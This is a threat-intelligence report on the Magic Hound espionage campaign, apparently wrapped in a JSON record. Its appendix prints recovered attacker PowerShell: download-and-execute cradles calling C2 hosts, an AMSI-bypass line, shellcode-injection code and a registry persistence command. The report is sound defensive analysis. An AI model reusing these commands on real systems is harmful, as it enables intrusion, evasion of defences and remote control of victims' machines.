{ "id": "4ab93e26-6855-447e-8253-7417c5566e81", "created_at": "2026-04-06T00:16:46.228844Z", "updated_at": "2026-04-10T03:37:55.914818Z", "deleted_at": null, "sha1_hash": "62318114dc658c48a61870c4062fd75a860f4f62", "title": "Magic Hound Campaign Attacks Saudi Targets", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3424475, "plain_text": "Magic Hound Campaign Attacks Saudi Targets\r\nBy Bryan Lee, Robert Falcone\r\nPublished: 2017-02-15 · Archived: 2026-04-05 13:10:38 UTC\r\nUnit 42 has discovered a persistent attack campaign operating primarily in the Middle East dating back to at least mid-2016\r\nwhich we have named Magic Hound. This appears to be an attack campaign focused on espionage. Based upon our visibility\r\nit has primarily targeted organizations in the energy, government, and technology sectors that are either based or have\r\nbusiness interests in Saudi Arabia. The adversaries appear to have evolved their tactics and techniques throughout the\r\ntracked time-period, iterating through a diverse toolset across different waves of attacks. Link analysis of infrastructure and\r\ntools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA\r\nOperation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called\r\nNewscasters. Artifacts of this campaign was also recently published by Secureworks CTU.\r\nWe were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat\r\nintelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples\r\nthemselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others. It is believed the\r\nuse of specific tools may have coincided with specific attack waves by this adversary, with the most recent attacks using\r\nweaponized Microsoft Office documents with malicious macros. Due to the large amount of data collected, and limitations\r\non attack telemetry, this blog will focus primarily on the most recent attacks occurring in the latter half of 2016.\r\nATTACK DETAILS\r\nThe samples initially collected and associated with Magic Hound were Microsoft Word and Excel documents containing\r\nembedded malicious macros. We were able to expand our data set by pivoting on infrastructure and tool behavior, which\r\nuncovered additional types of tools in use by Magic Hound, such as regular portable executable (PE) payloads, PE files\r\ncompiled in .NET Framework, various forms of IRC bots, and an open source file-less Python remote access tool called\r\nPupy.\r\nThe weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites,\r\nor on websites using domain names similar to legitimate domain names in appearance. The two legitimate websites we were\r\nable to identify were owned by organizations in the government and energy sectors. Based on the existence of these\r\nmalicious files on the legitimate websites, it is highly probable that the websites had already been compromised in some\r\nfashion. At the time of investigation, the files had already been removed from the websites. The two other delivery sites\r\nwere ntg-sa[.]com, which may be trying to spoof a Saudi based information and communication technology conglomerate\r\nand mol.com-ho[.]me, which may be trying to spoof the Ministry of Labor. A third delivery site was identified at its.com-ho[.]me which may appear to be a benign domain.\r\nSeveral of these documents were also found on a seemingly unrelated, but benign-looking domain, briefl[.]ink.\r\nIt is highly likely the adversary then used spear-phishing attacks containing links to these malicious documents as a delivery\r\nmechanism. We were ultimately able to identify multiple organizations in the government, energy, and technology sectors\r\ntargeted by Magic Hound.\r\nThe weaponized documents themselves all contained malicious macros which were designed to call Windows PowerShell to\r\nretrieve additional tools. A handful of lures with different themes were used repeatedly with variations throughout the\r\neighteen collected documents. They ranged from documents masquerading as official Saudi government forms to a holiday\r\ngreetings card. The forms masquerading as official government documents specifically used imagery from the Ministry of\r\nHealth and the Ministry of Commerce claiming to be mandatory forms that required macros to be enabled. Examples of the\r\ndocuments can be seen below:\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 1 of 20\n\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 2 of 20\n\nINFRASTRUCTURE\r\nAnalysis of the weaponized documents revealed some peculiarities right away. The majority of documents used the name\r\n“gerry knight” for the author field in the document metadata, and the embedded macros largely used direct IP connections to\r\ncommand and control (C2) servers rather than using domain names. These C2 servers also appeared to lack any relationships\r\nto each other and were hosted on a variety of VPS providers. Two of the Word documents using the “gerry knight” author\r\nname however were found to be communicating to C2 servers on two specific domains, www1.chrome-up[.]date and\r\nwww3.chrome-up[.]date. Using these domains as pivot points, we were able to expand our data set. As seen below, the\r\nrelational analysis proved to be quite fruitful:\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 3 of 20\n\nFigure 1 Overview of relationships\r\nWe rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in\r\naddition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic:\r\nFigure 2 Command and control overlaps\r\nFrom there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders,\r\ndroppers, loaders, and payloads. What initially appeared as a disparate and segregated attack campaign appeared very\r\nrapidly to be a persistent and prolonged attack campaign with very specific goals in mind.\r\nIn total, we were able to collect over fifty different samples via infrastructure reuse, behavioral matching, and the reuse of a\r\nspecific file for maintaining persistence. These tools included Microsoft Office documents, portable executables (PE), .NET\r\nFramework PE files, Meterpreter, IRC bots, an open sourced Meterpreter module called Magic Unicorn, and an open\r\nsourced Python RAT called Pupy.\r\nInterestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic\r\nHound was found to be the same IP used to deliver a different IRC bot called MPK.\r\nFigure 3 Rocket Kitten and Magic Hound infrastructure overlap\r\nThe MPK bot is not publicly available and had previously been attributed to an adversary group called “Rocket Kitten”\r\nwhich has often been thought to be a state sponsored adversary operating in the Middle East region. Although the likelihood\r\nof two different adversaries focused on espionage operating in the same geographical region using one specific IP and not\r\nbeing related somehow is fairly slim, due to limited telemetry, we lack additional corroborating evidence of a conclusive\r\nrelationship.\r\nMAGIC HOUND TOOLSET\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 4 of 20\n\nThe Magic Hound attacks did not rely on exploit code to compromise targeted systems, instead relying on executables and\r\nMicrosoft Office documents, specifically Excel and Word documents containing malicious macros. During our analysis, we\r\nwere able to determine the ultimate payload for several of these attacks. One payload was a Python based open source\r\nremote administration tool (RAT) called Pupy. A second payload was an IRC bot we have named MagicHound.Leash. We\r\nhave also seen this group use the Magic Unicorn module to generate a PowerShell script to deliver a shellcode-based\r\npayload. While we have not been able to obtain a secondary payload from the Unicorn generated PowerShell script, we\r\nbelieve that this group uses the script to deliver Metasploit's Meterpreter as a potential payload as well.\r\nWe have categorized the custom tools in use by the Magic Hound campaign into five categories, with corresponding names\r\nin Table 1. Additional details for these tools may be found in the appendix.\r\nTYPE NAME\r\nDropper MagicHound.DropIt\r\nExecutable Loader MagicHound.Fetch\r\nDocument Loader MagicHound.Rollover\r\nDownloader MagicHound.Retriever\r\nIRC Bot MagicHound.Leash\r\nTable 1  Types of MagicHound tools and their Corresponding Names\r\nMAGICHOUND.ROLLOVER\r\nThe Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method,\r\nspecifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The\r\nmalicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote\r\nserver. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute\r\ncommand of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic\r\nUnicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match\r\nfor code in Magic Unicorn containing the comment “one line shellcode injection with native x86 shellcode”.\r\nMAGICHOUND.FETCH\r\nIn addition to loading payloads using macros within delivery documents, we observed the Magic Hound campaign using\r\nexecutables to load secondary payloads from a remote server. Both a custom developed loader, which we have named\r\nMagicHound.Fetch, as well as the default loader that comes with Pupy were found to be in use. The Fetch loader allowed us\r\nto use attributes within the loader to uncover more tools used by this group, which included a backdoor and an IRC bot.\r\nFetch first attempts to create persistent access to the targeted host then retrieve a secondary payload from a remote server. To\r\nset up persistence, the loader writes a file to \"c:\\temp\\rr.exe\" and executes it with specific command line arguments to create\r\nauto run registry keys. All Fetch samples drop the same exact executable to set up persistence.\r\nMany of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings\r\nusing AES. However, they all used the same key \"agkrhfpdbvhdhrkj\". The loader's main goal was to run a PowerShell\r\ncommand to execute shellcode. We found the PowerShell command used by Fetch within the source code of Magic Unicorn,\r\nwhich was also used in the Magic Hound delivery documents. The shellcode executed by this PowerShell is the exact same\r\nas in the delivery documents, using code from Metasploit which can obtain additional shellcode to execute using an HTTP\r\nrequest to the following URL:\r\nhttp://www7.chrome-up[.]date/0m5EE\r\nWe were not able to retrieve the shellcode hosted at this URL. However, as alluded to above, we believe that this adversary\r\nused the open source Magic Unicorn tool to load a shellcode-based payload which is likely to be meterpreter.\r\nPUPY LOADER\r\nThe Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows,\r\nmacOS, Linux and Android. We have seen the Magic Hound campaign use both the 32-bit and 64-bit DLL loaders that come\r\nwith Pupy to infect Windows systems. Analysis of their configurations show that the C2 servers used both fully-qualified\r\ndomain names and IP addresses. Also, the configurations show the use of the “obfs3” (The Threebfuscator) transport, which\r\nis an obfuscation method to hide the true TCP-based communications protocol. The “obfs3” is used in the Tor project and\r\nthe specifics of this transport can be found at the Tor Project.\r\nMAGICHOUND.DROPIT\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 5 of 20\n\nThe Magic Hound campaign was also discovered using a custom dropper tool, which we have named MagicHound.DropIt.\r\nThe DropIt Trojan we analyzed is an executable that builds another executable by decoding embedded blobs of base64\r\nencoded data and concatenating them together in the correct order. In all of the DropIt samples we collected, the dropper\r\nthen saves the executable to the user’s %TEMP% folder and executes the file.\r\nWe have also seen Magic Hound using DropIt as a binder, specifically dropping a legitimate decoy executable along with\r\nthe malicious executable onto the target host. The legitimate decoy executable and the malicious executable are then both\r\nexecuted, but with the malicious file running in the background and the decoy presented to the user. These types of tactics\r\nare generally used for evasion and to not trigger and suspicion from the victim. In one example, the decoy executable was a\r\nlegitimate Flash installer, therefore from the victim’s perspective, they would experience the expected behavior of a Flash\r\ninstaller.\r\nMAGICHOUND.RETRIEVER\r\nWe observed a DropIt sample installing another Trojan we call MagicHound.Retriever. At a high level, Retriever is a .NET\r\ndownloader that retrieves secondary payloads using an embedded URL in its configuration as the C2. Retriever uses .NET\r\nweb services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests\r\nresembling the example request in Figure 4.\r\nFigure 4 Retriever HTTP request sent to its C2 server\r\nMAGICHOUND.LEASH\r\nThe Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. We\r\ndiscovered this connection when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2\r\ncommunications.\r\nLeash obtains its commands via private messages (PRIVMSG) sent from the adversary who must also be connected to the\r\nIRC server. All of its available commands (see Appendix), except for the VER command seen in Figure 5, must be issued by\r\nindividuals in the IRC channel with nicknames that start with \"AS_\" or \"AF_\".\r\nFigure 5 Lecash bot responding to VER command\r\nThere are a great deal of similarities between the IRC bot originally discussed in iSight's NEWSCASTER whitepaper and\r\nLEASH. iSight's whitepaper provided details on an IRC bot, which some refer to as Parastoo based on the password used to\r\njoin the IRC channel, as seen in the following network traffic generated when attempting to connect to the C2:\r\nParastoo Trojan MagicHound.Leash\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 6 of 20\n\nUSER AS_ # # :des\r\nNICK t__982\r\nJOIN :#tistani Parastoo\r\nUSER AS_a # # :des\r\nNICK Conroy\r\nJOIN :#kalk\r\nPerforming a binary diff revealed a 67% similarity between the Leash and Parastoo samples. In addition to sharing\r\nsignificant portions of code, both of the IRC bots require an IRC user's nickname to start with either \"AF_\" or \"AS_\" to run\r\ncommands on the system. Also, the two bots have similar responses to \"VER\" commands seen in Figure 6 below, which\r\ndiffer slightly from the responses seen generated by Leash.\r\nFigure 6 Parastoo Trojan responding to commands in similar manner to Leash\r\nMPKBot\r\nWe also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on. This\r\nMPK IRC bot is very similar to the MPK Trojan that used a custom C2 communications protocol, as detailed in a\r\n whitepaper by CheckPoint regarding a threat group called Rocket Kitten. We believe this version of the MPK Trojan is\r\nbased on the same code base, as both the IRC version and the one referenced in the white paper have considerable\r\nsimilarities from a behavior standpoint as well as direct code overlap.\r\nCONCLUSION\r\nThe Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East\r\nregion. Organizations in the government, energy, and technology sectors have been targeted by this adversary, specifically\r\norganizations based in or doing business in Saudi Arabia. The toolset used by the Magic Hound campaign was an assortment\r\nof custom tools, as well as open sourced tools available to the general public. None of the tools we uncovered were found to\r\nbe exploit-driven, and relied exclusively on social engineering tactics to compromise targets. While we did discover a\r\npotential relationship with the Rocket Kitten adversary group, we cannot confirm the extent of that relationship at this time,\r\nalthough we will continue to monitor the activities of Magic Hound.\r\nPalo Alto Networks customers are protected via the following:\r\nWildFire identification and detection of malicious samples\r\nCommand and control servers are classified as malicious\r\nAutoFocus tags have been created\r\nMagic Hound\r\nMagicHound DropIt\r\nMagicHound Fetch\r\nMagicHound Retriever\r\nMagicHound Rollover\r\nMagicHound Leash\r\nMagicHound MPKBot\r\nPuPYRAT\r\nINDICATORS OF COMPROMISE\r\nMagicHound.DropIt SHA256\r\nc21074f340665935e6afe2a972c8d1ab517954e2dd05cc73e5ff0e8df587b99d\r\nea139a73f8ec75ea60dfa87027c7c3ef4ed61b45e1acb5d1650cc54e658984ba\r\nda2abdc951e4b2272fea5c8989debd22e26350bab4b4219104bccec5b8a7ff5a\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 7 of 20\n\n0d3ae682868cb3ff069ec52e1ffc5ef765453fd78e47b6366d96aebb09afd8ab\r\nf0ecc4388f0d84501499711681a64a74c5d95e0bb6a2174cbe3744bd5a456396\r\n860f4cd44371a180a99bc16526f54f8b051c420a3df334d05d569d0cdadac3d2\r\nb42b1186211633c2d47f3d815f0371ba234fee2ed0f26e487badc58e1ab81061\r\n4beee6e7aa244335e161fdc05296ea100090c2114b4ff2e782e3ee3e1f936fdf\r\n5e0e09c9860b293c4c9a2382a7392963adc54d6a23440abb9a2d89c50f8fd305\r\n3161f9087d89a2d036ea32741d5a006c6bb279d36ff8d1acde63f2e354f8c502\r\nMagicHound.Fetch PE SHA256\r\nb6c159cad5a867895fd41c103455cebd361fc32d047b573321280b1451bf151c\r\n6a7537f2cedbf453114cfba086e4746e698713777fb4fa4fc8964247dde741ed\r\n16d87fbd8667677da1af5433b6d797438f8dc0ab565fb40ecb29f83f148888cd\r\n92bc7d04445cf67aa7ddf15792cd62778d2d774d06616d1986f4c389b3d463f5\r\n86d3409c908f667dd298b6a7e1e17652bb29af73e7daed4a5e945fbdf742e9f4\r\nc3a8f5176351e87d28f45e58c79bb6646bb5d94ade7a24c6556514c860004143\r\na390365ddfcce146a8fa8435022f19b9a1be29f2b11a049cb660ec53f36beb06\r\nd2ffc757a12817e4b58b3d58d71da951b177dedd3f65ca41fad04a03fc63fac6\r\n79c9894b50cde62b182bd1560060c5c2bf5a1cef2b8afdffc4766e8c55ff6932\r\n2f7f3582504fbce349a6991fbb3b5f9577c5c014b6ce889b80d51977fa6fb31a\r\n8c2e4aa8d73ad2e48d70dfa18abea62769c7bef59c8c1607720f4f6162413f75\r\nabe8e86b787998a07411ee24f3f3d8a79e37c6da539650ceed566b081f968c26\r\n9e4d2e983f8a807f741f8873e6fa5d222dc6f3b358ccfc3a6c700398b342f656\r\ne57f77cc3d117923ec01aa0e044edc11b1042e57993ca7f74d971630893ca263\r\nca6e823dedd6ca5fada2b1fa63d0acb288027f5a3cdd2c60dcace3c424c5ced0\r\neaaecabb439c81e522d9f5681fdb047ee62381e763f0d9646e68cd507479ba5a\r\n1c3e527e496c4b0594a403d6d582bc6db3029d27369720d0d5122f862b10d8f1\r\n29a659fb0ef0262e4de0dc3c6a140677b6ddee13c1819b791bd280be0547e309\r\nMagicHound.Fetch PE C2\r\nservice.chrome-up[.]date\r\nwww3.chrome-up[.]date\r\nwww7.chrome-up[.]date\r\ntimezone[.]live\r\nservice1.chrome-up[.]date\r\n104.238.184[.]252\r\nwww5.chrome-up[.]date\r\nservicesystem.serveirc[.]com\r\nMagicHound.Fetch DOC SHA256\r\n218fac3d0639c0d762fcf71685bcf6b64c33d1533df03b4cf223d9b07ca1e3c2\r\ne5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6\r\n71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 8 of 20\n\n388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d\r\n33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e\r\n5469facc266d5582bd387d69032a91c8fff373213b66a2f0852666e72bcdc1da\r\n528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62\r\n66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b\r\ncfce4827106c79a81eef6d3a0618c90bf5f15936036873573db76bed7e8a0864\r\n68db2b363a88b061cc9063535f3920673f1f08d985b14cb52b898ced6c0f8964\r\ne837f6b814c09900726dac2cf55f41babf361152875ba2a765a34ee5cc496087\r\nf912d40de9fe9a726448c1d84dfba2d4941f57210b2dbc035f5d34d68e8ac143\r\naf0ae0fa877f921d198239b7c722e12d14b2aa32fdfadaa37b47f558ae366de9\r\n6d1a50ca3e80442fa3e2caca86c166ed60bef32c2d0af7352cd227303cdec031\r\nMagicHound.Fetch DOC C2\r\n45.76.128[.]165\r\n139.59.46[.]154\r\n104.218.120[.]128\r\n89.107.62[.]39\r\n69.87.223[.]26\r\nanalytics-google[.]org\r\n89.107.60[.]11\r\nwww3.chrome-up[.]date\r\nwww.microsoftsubsystem.com-adm[.]in\r\nwww1.chrome-up[.]date\r\nMagicHound.Fetch XLS SHA256\r\n6c195ea18c05bbf091f09873ed9cd533ec7c8de7a831b85690e48290b579634b\r\n97943739ccf8a00036dd3cdd0ba48e17a82ab9b65cc22c17c6e6258e72bb9ade\r\nMagicHound.Fetch XLS C2\r\n45.76.128[.]165\r\n139.59.46[.]154\r\nPupy Loaders SHA256\r\n7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73\r\ndb453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f\r\n82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190\r\nPupy Loaders C2\r\n139.59.46[.]154\r\nwww1.chrome-up[.]date\r\nMagicHound.Retriever SHA256\r\n1c550dc73b7a39b0cd21d3de7e6c26ece156253ac96f032efc0e7fcc6bc872ce\r\n7cdbf5c035a64cb6c7ee8c204ad42b4a507b1fde5e6708ea2486942d0d358823\r\nb2ea3fcd2bc493a5ac86e47029b076716ed22ef4487f9090f4aa1923a48015d6\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 9 of 20\n\n3f23972a0e80983351bedf6ad45ac8cd63669d3f1c76f8834c129a9e0418fff1\r\nMagicHound.Retriever C2\r\nservice.chrome-up[.]date\r\nmsservice[.]site\r\nmicrosoftexplorerservices[.]cloud\r\nMagicHound.Leash SHA256\r\n133959be8313a372f7a8d95762722a6ca02bc30aaffde0cbcf6ba402426d02f5\r\nba3560d3c789984ca29d80f0a2ea38a224e776087e0f28104569630f870adaf4\r\nd8731a94d17e0740184910ec81ba703bad5ff7afc92ba056f200533f668e07bf\r\nMagicHound.Leash C2\r\n45.56.123[.]129\r\nsyn.timezone[.]live\r\nMPKBot SHA256\r\nd08d737fa59edbea4568100cf83cff7bf930087aaa640f1b4edf48eea4e07b19\r\nMPKBot C2\r\n45.58.37[.]142\r\nAppendix\r\nMAGICHOUND.ROLLOVER\r\nThe Magic Hound campaign used Word and Excel documents as a delivery method, specifically documents that contain a\r\nmalicious macro that attempts to load either the Pupy RAT or possibly Meterpreter. We call this tool MagicHound.Rollover.\r\nIn one example, the Word document contained a button with the label “First click \"Enable Content\" above the page, then\r\nclick here to fill out the form”\r\nThis string attempts to trick the user into enabling macros to execute the malicious code within the macro. When the macro\r\nexecutes, it unhides a table that contains the contents of a legitimate document in an attempt to make the user less suspicious\r\nof the malicious activities occurring in the background. The macro contains malicious code that attempts to download\r\ncontent from a remote server.\r\nThe macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available\r\ntechniques. The first technique is rather straightforward, using PowerShell’s \"iex\" function to execute a string obtained from\r\na remote server. The macro carries out this first technique by running the following command:\r\npowershell.exe -w hidden -noni -nop -c \"iex(New-Object\r\nSystem.Net.WebClient).DownloadString('hxxp://139.59.46.154:3485/eiloShaegae1')\"\r\nThe code above generates the following HTTP request, which the C2 server would then respond to with a script that\r\nPowerShell would execute:\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 10 of 20\n\nGET /eiloShaegae1 HTTP/1.1\r\nHost: 139.59.46[.]154:3485\r\nConnection: Keep-Alive\r\nThe second method involves using PowerShell to create a thread to execute a buffer of shellcode, which we believe the\r\nthreat actors obtained from the Magic Unicorn source code. The Unicorn source code contains a comment for this specific\r\nPowerShell command, which is described as a “one line shellcode injection with native x86 shellcode”.\r\nThe shellcode begins with a stub that is responsible for decrypting additional shellcode. To decrypt the additional shellcode,\r\nthe stub code will start with an initial key, such as 0x6CAF9362 and XOR the first DWORD of the additional shellcode. It\r\nwill then add the resulting DWORD to the key that the stub code will use to decrypt the second DWORD and so on. After\r\nwe decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework,\r\nspecifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain\r\nadditional shellcode to execute on the system. The assembly code used to create the shellcode can be obtained from:\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm\r\nhttps://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm\r\nThe purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL\r\n\"hxxp://45.76.128[.]165:4443/0w0O6\". We are unsure of the shellcode hosted at this URL, but it is possible that additional\r\nshellcode-based payloads like Meterpreter could have been served by this shellcode.\r\nTwo Rollover delivery documents (SHA256: 6c195ea18c05bbf091f09873ed9cd533ec7c8de7a831b85690e48290b579634b\r\nand SHA256: 218fac3d0639c0d762fcf71685bcf6b64c33d1533df03b4cf223d9b07ca1e3c2) attempted to communicate with\r\nthe URL hxxp://139.59.46[.]154:3485/eiloShaegae1 to obtain additional code to execute. On January 1, 2017, we observed\r\nthis URL responding to the above HTTP request with the following data:\r\npowershell.exe -exec bypass -window hidden -noni -nop -encoded\r\nJABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZA\r\nAs you can see, the C2 server responds with a PowerShell command that will run on the system. The PowerShell command\r\ndecodes to the following:\r\n$command =\r\n'WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlA\r\n        if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\r\n        {\r\n            $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $comm\r\n            IEX $exec\r\n        }\r\n        else\r\n        {\r\n            $exec = [System.Convert]::FromBase64String($command)\r\n            $exec = [Text.Encoding]::Unicode.GetString($exec)\r\n            IEX $exec\r\n        }\r\nThe script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64\r\nencoded command that decodes to the following:\r\n[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};\r\n    try{\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 11 of 20\n\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed',\r\n'NonPublic,Static').SetValue($null, $true)\r\n    }catch{}\r\n    IEX (New-Object Net.WebClient).DownloadString('http:// 139.59.46[.]154:3485 /IMo8oosieVai');\r\nThis decoded PowerShell script attempts to download and execute a file using HTTP from the URL \"hxxp://\r\n139.59.46[.]154:3485 /IMo8oosieVai\". The C2 server will respond to this HTTP GET request with a large amount of data\r\nthat includes a PowerShell script that also contains a DLL payload that is embedded as a series of base64 encoded chunks,\r\nthat is then decoded using the following code:\r\n$PEBytesTotal =\r\n[System.Convert]::FromBase64String($PEBytes0+$PEBytes1+$PEBytes2+$PEBytes3+$PEBytes4+$PEBytes5+$PEBytes6+$PEBytes7+$PEBytes\r\nThe PowerShell script loads the DLL payload directly into memory without saving it to the disk. The Pupy payload was\r\ngenerated using the following configuration, which shows the C2 IP/port and the use of the \"obfs3\" transport:\r\nLAUNCHER_ARGS=['--host', '139.59.46[.]154:3543', '-t', 'obfs3']\r\nIt appears the adversary used a majority of the following Pupy module to create the PowerShell commands used in the\r\ndelivery documents:\r\nhttps://github.com/n1nj4sec/Pupy/blob/master/Pupy/Pupylib/payloads/ps1_oneliner.py\r\nMAGICHOUND.FETCH\r\nThe custom loader Trojan used by this group, which we call MagicHound.Fetch is responsible for setting up persistent\r\naccess to the system and to reach out to a remote server to download and execute a secondary payload. To set up persistence,\r\nthe loader creates a folder named \"c:\\temp\", sets its attributes to be a hidden and system folder to hide the folder from view\r\nin Windows Explorer. It then writes a file named \"rr.exe\" (SHA256:\r\nf439dee4210d623b5aa7491bad8e8d9b43305f25a5d26940eb36f6460215cf8e) to this folder and executes it with specific\r\ncommand line arguments. During our analysis, we observed one loader running “rr.exe” with the following arguments:\r\nopen cmd.exe /c c:\\\\temp\\\\rr.exe SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\n\"C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\spp.exe\" iexplore\r\nThe \"rr.exe\" payload dropped to the system does nothing more than use the supplied command line arguments to create a\r\nregistry key to execute the payload each time the system starts. In the example above, the \"spp.exe\" executable would be\r\nadded to an auto-run registry key at:\r\nSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iexplore\r\nMany of the Fetch samples attempted to obfuscate their functionality by encrypting their embedded strings with AES using\r\nthe same key \"agkrhfpdbvhdhrkj\"; however, the loader's main goal involved running the following command:\r\n/c powershell -window hidden -EncodedCommand\r\nJAAwAG8AOABlACAAPQAgACcAJABmADkAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGw\r\nThe base64 encoded command decodes to the following:\r\n$0o8e = '$f9B = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,\r\nuint flAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $f9B -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z =\r\n\u0026lt;shellcode REDACTED for brevity\u0026gt;;$g = 0x1000;if ($z.Length -gt 0x1000){$g =\r\n$z.Length};$rJr=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]\r\n($rJr.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$rJr,0,0,0);for (;;){Start-sleep 60};';$e =\r\n[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($0o8e));$DKn = \"-enc\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 12 of 20\n\n\";if([IntPtr]::Size -eq 8){$b32 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";iex \"\u0026amp;\r\n$b32 $DKn $e\"}else{;iex \"\u0026amp; powershell $DKn $e\";}\r\nThe decoded command above builds a buffer that it uses to store shellcode and creates a thread to execute it. We found the\r\ncommand above within the source code of Magic Unicorn, which was also used in the Magic Hound delivery documents.\r\nThe shellcode executed by this command is the same as in the delivery documents as well, specifically taken from\r\nMetasploit to obtain additional shellcode to execute using an HTTP request to the following URL:\r\nhttp://www7.chrome-up[.]date/0m5EE\r\nWe are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload.\r\nHowever, as alluded to above, we believe that this adversary used the open source Magic Unicorn tool to load a shellcode-based payload. The fact that the actor used Metasploit shellcode within the Unicorn generated PowerShell script leads us to\r\nspeculate that the ultimate payload of this attack is Meterpreter, which is a shellcode-based payload.\r\nPUPY LOADER\r\nPupy comes with default loaders that run the RAT on a variety of different platforms, specifically Windows, OSX, Linux\r\nand  We have seen the Magic Hound actors using both the 32-bit and 64-bit DLL loaders that come with Pupy to infect\r\nWindows systems. We have gathered three samples of the default loader associated with this group and extracted the\r\nfollowing configurations:\r\nSHA256 of Sample 